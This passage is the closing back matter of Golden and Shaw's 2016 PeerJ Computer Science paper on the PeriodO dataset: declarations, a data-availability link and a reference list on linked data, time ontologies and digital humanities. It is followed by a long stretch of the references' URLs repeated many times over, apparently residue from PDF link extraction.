Humanities: HD-51864-14. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 16/18 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.44 Competing Interests The authors declare there are no competing interests. Author Contributions • Patrick Golden and Ryan Shaw conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: PeriodO dataset: http://n2t.net/ark:/99152/p0. REFERENCES Belarte MC. 2008. Domestic architecture and social differences in north-eastern Iberia during the Iron Age (c.525–200 BC). Oxford Journal of Archaeology 27:175–199 DOI 10.1111/j.1468-0092.2008.00303.x. Bradley J, Short H. 2005. Texts into databases: the evolving field of new-style prosopography. Literary and Linguistic Computing 20(Suppl. no. 1):3–24 DOI 10.1093/llc/fqi022. Buckland M. 2006. Description and search: metadata as infrastructure. Brazilian Journal of Information Science 0(0):3–14. Available at http://www2.marilia.unesp.br/revistas/index.php/ bjis/article/viewArticle/26. Carothers G, Prud’hommeaux E. 2014. RDF 1.1 Turtle. W3C recommendation, W3C. Available at http://www.w3.org/TR/2014/REC-turtle-20140225/. Eisenstein E. 1979. The printing press as an agent of change: communications and cultural transformations in early-modern Europe. Cambridge: Cambridge University Press. Elliott T, Gillies S. 2011. Pleiades: an un-GIS for Ancient Geography. In: Digital humanities conference 2011. Stanford. Available at http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ ab-192.xml. Gillies S. 2015. Event-like GeoJSON Features Using JSON-LD. Available at https://github.com/ geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md. Gradmann S. 2014. From containers to content to context. Journal of Documentation 70(2):241–260 DOI 10.1108/JD-05-2013-0058. Groth P, Gibson A, Velterop J. 2010. The anatomy of a nanopublication. Information Services & Use 30(1–2):51–56 DOI 10.3233/ISU-2010-0613. Groth P, Schultes E, Thompson M, Tatum Z, Dumontier M. 2013. Nanopublication Guidelines. In: Concept web alliance working draft, concept web alliance. Available at http://www.nanopub. org/2013/WD-guidelines-20131215/. Heath T, Bizer C. 2011. Linked data: evolving the web into a global data space. Synthesis Lectures on the Semantic Web: Theory and Technology 1(1):1–136 DOI 10.2200/S00334ED1V01Y201102WBE001. Hobbs J, Pan F. 2006. Time ontology in OWL.W3C working draft, W3C. Available at http://www. w3.org/TR/2006/WD-owl-time-20060927/. Golden and Shaw (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.44 17/18 https://peerj.com/computer-science/ http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://n2t.net/ark:/99152/p0 http://dx.doi.org/10.1111/j.1468-0092.2008.00303.x http://dx.doi.org/10.1093/llc/fqi022 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www2.marilia.unesp.br/revistas/index.php/bjis/article/viewArticle/26 http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://www.w3.org/TR/2014/REC-turtle-20140225/ http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml http://dh2011abstracts.stanford.edu/xtf/view?docId=tei/ab-192.xml https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md https://github.com/geojson/geojson-ld/blob/8f08cf2df2e61de3a666ed90be43a14eada4cc03/time.md http://dx.doi.org/10.1108/JD-05-2013-0058 http://dx.doi.org/10.3233/ISU-2010-0613 http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://www.nanopub.org/2013/WD-guidelines-20131215/ http://dx.doi.org/10.2200/S00334ED1V01Y201102WBE001 http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ http://www.w3.org/TR/2006/WD-owl-time-20060927/ 